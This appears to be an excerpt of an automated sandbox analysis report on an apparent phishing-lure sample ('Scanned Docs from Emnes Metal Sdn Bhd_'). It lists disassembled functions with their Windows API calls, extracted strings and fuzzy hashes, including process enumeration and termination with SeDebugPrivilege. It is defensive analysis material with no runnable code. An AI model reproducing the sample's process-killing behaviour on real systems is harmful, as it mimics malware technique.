                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                      • String ID:
                                                      • API String ID: 2014098862-0
                                                      • Opcode ID: 0140f9941d1ee2345a52bf47ece9e90dda6bbdfcd0fd86a21d024f81bf006b25
                                                      • Instruction ID: 5c940bf22fef74d445ae5e7e463f0d82148b89a395963497e4756b2186f60eba
                                                      • Opcode Fuzzy Hash: 0140f9941d1ee2345a52bf47ece9e90dda6bbdfcd0fd86a21d024f81bf006b25
                                                      • Instruction Fuzzy Hash: 4801D4307E0364BBFB1067699C8EF997F9DDB4EB12F505011F318AF1D1C9E224548A69
                                                      Function 002E1803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,002E1449,?,?,00000000), ref: 002E180C
                                                      • HeapAlloc.KERNEL32(00000000,?,002E1449,?,?,00000000), ref: 002E1813
                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,002E1449,?,?,00000000), ref: 002E1828
                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,002E1449,?,?,00000000), ref: 002E1830
                                                      • DuplicateHandle.KERNEL32(00000000,?,002E1449,?,?,00000000), ref: 002E1833
                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,002E1449,?,?,00000000), ref: 002E1843
                                                      • GetCurrentProcess.KERNEL32(002E1449,00000000,?,002E1449,?,?,00000000), ref: 002E184B
                                                      • DuplicateHandle.KERNEL32(00000000,?,002E1449,?,?,00000000), ref: 002E184E
                                                      • CreateThread.KERNEL32(00000000,00000000,002E1874,00000000,00000000,00000000), ref: 002E1868
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                      • String ID:
                                                      • API String ID: 1957940570-0
                                                      • Opcode ID: 8f5bb393fd18f28bbee2ef4081db90ce494778c836c6dce6dc5fe27cb119fe1e
                                                      • Instruction ID: 81c377ed1b6edbf78efb10fdf7684df106771f64bb26bfd7032a4c89e3ee6dbf
                                                      • Opcode Fuzzy Hash: 8f5bb393fd18f28bbee2ef4081db90ce494778c836c6dce6dc5fe27cb119fe1e
                                                      • Instruction Fuzzy Hash: A201BFB52D0344BFE711AB65DC4DF977B6CEB89B11F409421FA05DB191C6749810CB20
                                                      Function 0030A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 002ED4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 002ED501
                                                        • Part of subcall function 002ED4DC: Process32FirstW.KERNEL32(00000000,?), ref: 002ED50F
                                                        • Part of subcall function 002ED4DC: CloseHandle.KERNEL32(00000000), ref: 002ED5DC
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0030A16D
                                                      • GetLastError.KERNEL32 ref: 0030A180
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0030A1B3
                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 0030A268
                                                      • GetLastError.KERNEL32(00000000), ref: 0030A273
                                                      • CloseHandle.KERNEL32(00000000), ref: 0030A2C4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                      • String ID: SeDebugPrivilege
                                                      • API String ID: 2533919879-2896544425
                                                      • Opcode ID: 8de31f0b2476a83832413555ea70383376e9f6d9c2a487f77df4eaade3ce84d7
                                                      • Instruction ID: cdda43d7d042ff2acbdc46c8bf0df8795abcc3a7a984ab84a00197808f7640ef
                                                      • Opcode Fuzzy Hash: 8de31f0b2476a83832413555ea70383376e9f6d9c2a487f77df4eaade3ce84d7
                                                      • Instruction Fuzzy Hash: F861BB34216742AFD321DF18D4A4F15BBA9AF54308F19849CE4668BBE3C772EC45CB92
                                                      Function 00313886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00313925
                                                      • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0031393A
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00313954
                                                      • _wcslen.LIBCMT ref: 00313999
                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 003139C6
                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 003139F4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window_wcslen
                                                      • String ID: SysListView32
                                                      • API String ID: 2147712094-78025650
                                                      • Opcode ID: c332f7890855c0c4754fcef5ca382a644423b4d4d31d13c47ec51ae339c01e96
                                                      • Instruction ID: b194ec35c22d50f1d5535034b6dab2f15e91631af431cb5e178571affdd061f4
                                                      • Opcode Fuzzy Hash: c332f7890855c0c4754fcef5ca382a644423b4d4d31d13c47ec51ae339c01e96
                                                      • Instruction Fuzzy Hash: 3D41C231A00218ABEF269F64CC49FEA7BA9EF0C350F150526F958E7281D7719E94CB90
                                                      Function 002EBC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002EBCFD
                                                      • IsMenu.USER32(00000000), ref: 002EBD1D
                                                      • CreatePopupMenu.USER32 ref: 002EBD53
                                                      • GetMenuItemCount.USER32(00D35900), ref: 002EBDA4
                                                      • InsertMenuItemW.USER32(00D35900,?,00000001,00000030), ref: 002EBDCC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                      • String ID: 0$2
                                                      • API String ID: 93392585-3793063076
                                                      • Opcode ID: 70cbbbe0c76ea318bce2a012d6c1f851396d32539d131d77376c8d73f0ea62b0
                                                      • Instruction ID: 5cbf4c86becb38e4d49baba759e3de7a00cbe9c265d193b49458bb5002bff4ab
                                                      • Opcode Fuzzy Hash: 70cbbbe0c76ea318bce2a012d6c1f851396d32539d131d77376c8d73f0ea62b0
                                                      • Instruction Fuzzy Hash: 5751D170A6028A9BDF12CFAACC88BEFBBF8BF45314F648159E411D7290D7709960CB51
                                                      Function 002A2D20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _ValidateLocalCookies.LIBCMT ref: 002A2D4B
                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 002A2D53
                                                      • _ValidateLocalCookies.LIBCMT ref: 002A2DE1
                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 002A2E0C
                                                      • _ValidateLocalCookies.LIBCMT ref: 002A2E61
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                      • String ID: &H*$csm
                                                      • API String ID: 1170836740-447412993
                                                      • Opcode ID: 9c2d763e16d93d1ab3502ab56090f4d4b6342ebbec6c6ab72282674ce6854219
                                                      • Instruction ID: 9362c3dce3f17dd6c62df48e5490a29c0f11b0ddfa2305fd21af8c834b359719
                                                      • Opcode Fuzzy Hash: 9c2d763e16d93d1ab3502ab56090f4d4b6342ebbec6c6ab72282674ce6854219
                                                      • Instruction Fuzzy Hash: 5841A234A20209EBCF10DF6CC845A9EBBB5BF46324F148155E814AB352DF35EA29CF90
                                                      Function 002EC874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadIconW.USER32(00000000,00007F03), ref: 002EC913
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: IconLoad
                                                      • String ID: blank$info$question$stop$warning
                                                      • API String ID: 2457776203-404129466
                                                      • Opcode ID: 0aa9f8e5dd965e95870bedd041cf87a3584705f4013e4f865c41654a52cb51fe
                                                      • Instruction ID: 818a3fa158f573fbaf50e172395684b11ef298478e2f64c68d1c2245d83e7af7
                                                      • Opcode Fuzzy Hash: 0aa9f8e5dd965e95870bedd041cf87a3584705f4013e4f865c41654a52cb51fe
                                                      • Instruction Fuzzy Hash: B011EE316F9347BAA702AF959C83CFE67DCDF16354BB0002AF900A6283DBF4AD115665
                                                      Function 002EED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$LocalTime
                                                      • String ID:
                                                      • API String ID: 952045576-0
                                                      • Opcode ID: 2f3595bed02a0ba0e02a59d9d6775f58029a52b4ab169a29bca7312bd18b729a
                                                      • Instruction ID: 74ebe801d2ee4c840add982e1dd2fccb2ae3151044fc668a8dbdffde8f859d22
                                                      • Opcode Fuzzy Hash: 2f3595bed02a0ba0e02a59d9d6775f58029a52b4ab169a29bca7312bd18b729a
                                                      • Instruction Fuzzy Hash: 15418565C20258A6CB11FBF58C8AACFB7ACAF46710F544462E914E3122EF34D265CBA5
                                                      Function 0029F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,002D682C,00000004,00000000,00000000), ref: 0029F953
                                                      • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,002D682C,00000004,00000000,00000000), ref: 002DF3D1
                                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,002D682C,00000004,00000000,00000000), ref: 002DF454
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ShowWindow
                                                      • String ID:
                                                      • API String ID: 1268545403-0
                                                      • Opcode ID: ffd7ec91b588cc9696c96961596f06e94238b66c8c0e96b04569e2972257d3c3
                                                      • Instruction ID: 5d7130851aa6c9268db315650d03c435c9f8b1463ac8e7a5bcb200141cc993be
                                                      • Opcode Fuzzy Hash: ffd7ec91b588cc9696c96961596f06e94238b66c8c0e96b04569e2972257d3c3
                                                      • Instruction Fuzzy Hash: 73413D312346C1BEEFF99F29CB8876A7B95AB4A314F14843DE087D6660C67198A0CB10
                                                      Function 00312D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DeleteObject.GDI32(00000000), ref: 00312D1B
                                                      • GetDC.USER32(00000000), ref: 00312D23
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00312D2E
                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00312D3A
                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00312D76
                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00312D87
                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00315A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00312DC2
                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00312DE1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                      • String ID:
                                                      • API String ID: 3864802216-0
                                                      • Opcode ID: 8b668abb107c5cb9adba01c39dcd183dc79c5d6561fae1fc152663cf031c282b
                                                      • Instruction ID: dd5363400bac91bc27c761eeec9ec7f052066cef79f037e7977273b969e2f774
                                                      • Opcode Fuzzy Hash: 8b668abb107c5cb9adba01c39dcd183dc79c5d6561fae1fc152663cf031c282b
                                                      • Instruction Fuzzy Hash: A9319C72251214BFEB168F50DC8AFEB3BADEF0D711F089055FE089A291C6759C60CBA4
                                                      Function 002E5622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: _memcmp
                                                      • String ID:
                                                      • API String ID: 2931989736-0
                                                      • Opcode ID: a970d0589878d7360b499482df74b3e4f85ac3cfe8833fc6294bac3682e1cd98
                                                      • Instruction ID: 69f65a24740b8a762b5ced6869ed29e8daec246132d4c5cc87d0241c7a1e14ba
                                                      • Opcode Fuzzy Hash: a970d0589878d7360b499482df74b3e4f85ac3cfe8833fc6294bac3682e1cd98
                                                      • Instruction Fuzzy Hash: 6421AA616F09667BD6199E124D92FFB735CAF1539CF840020FD045A585FB60ED3085E5
                                                      Function 00304FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                      • API String ID: 0-572801152
                                                      • Opcode ID: d441f0b1dc7d9955058e4903c219d16dcb5f85ab2623a2d2b13cd214e0dd91ac
                                                      • Instruction ID: 4bea42e5bb57017bbdf16d6301328198d5b497f8e07f4c71548a99f7b95d16cf
                                                      • Opcode Fuzzy Hash: d441f0b1dc7d9955058e4903c219d16dcb5f85ab2623a2d2b13cd214e0dd91ac
                                                      • Instruction Fuzzy Hash: 13D1F175A0160AAFDF15CFA8C890BAFB7B9BF48344F158069E915AB280E770DD41CF90
                                                      Function 002C1522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCPInfo.KERNEL32(?,?), ref: 002C15CE
                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 002C1651
                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 002C16E4
                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 002C16FB
                                                        • Part of subcall function 002B3820: RtlAllocateHeap.NTDLL(00000000,?,00351444,?,0029FDF5,?,?,0028A976,00000010,00351440,002813FC,?,002813C6,?,00281129), ref: 002B3852
                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 002C1777
                                                      • __freea.LIBCMT ref: 002C17A2
                                                      • __freea.LIBCMT ref: 002C17AE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                      • String ID:
                                                      • API String ID: 2829977744-0
                                                      • Opcode ID: f9192af425bab01857a851a1a3abf35f9a1d07b5f57c94b547dd372c18007d40
                                                      • Instruction ID: 2c24e2f6514a6a90f10e5905dadd45677f7b6a3633980a6934a9e7b089283022
                                                      • Opcode Fuzzy Hash: f9192af425bab01857a851a1a3abf35f9a1d07b5f57c94b547dd372c18007d40
                                                      • Instruction Fuzzy Hash: C7918471E302169ADB218E64CC52FEEBBA99F4A350F54475DE801E7182D735DC74CB60
                                                      Function 00304523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearInit
                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                      • API String ID: 2610073882-625585964
                                                      • Opcode ID: 54dbf30c35c8679806a56a0a6f6b611a7b97316edf2c6dca2dc59f1fe51fdd66
                                                      • Instruction ID: b00d23df35c67c32f027e214cb3653930933562bb6ac56e43624d0da7279d28b
                                                      • Opcode Fuzzy Hash: 54dbf30c35c8679806a56a0a6f6b611a7b97316edf2c6dca2dc59f1fe51fdd66
                                                      • Instruction Fuzzy Hash: A191A1B1A01219AFDF21CFA5CC54FAEBBB8EF46710F108559F615AB280D7709A41CFA0
                                                      Function 002F1187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 002F125C
                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 002F1284
                                                      • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 002F12A8
                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 002F12D8
                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 002F135F
                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 002F13C4
                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 002F1430
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                      • String ID:
                                                      • API String ID: 2550207440-0
                                                      • Opcode ID: cf0ccae464a6c9cb3e590bbe9ef1f519083daff74069239992c21d9f3f3a158f
                                                      • Instruction ID: 853660a1157ad037d71c53822fa67cfd69fa4c0fc55fbb719e3e73799a75518a
                                                      • Opcode Fuzzy Hash: cf0ccae464a6c9cb3e590bbe9ef1f519083daff74069239992c21d9f3f3a158f
                                                      • Instruction Fuzzy Hash: 5D91EF71A20219DFEB01DF94C884BBEB7B5FF45364F104029EA11EB291DB74A961CF90
                                                      Function 0029948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ObjectSelect$BeginCreatePath
                                                      • String ID:
                                                      • API String ID: 3225163088-0
                                                      • Opcode ID: c7cd36431cfd85cbc9cefe7f910705308bb2fd0cab03890fa16269014a3cde8f
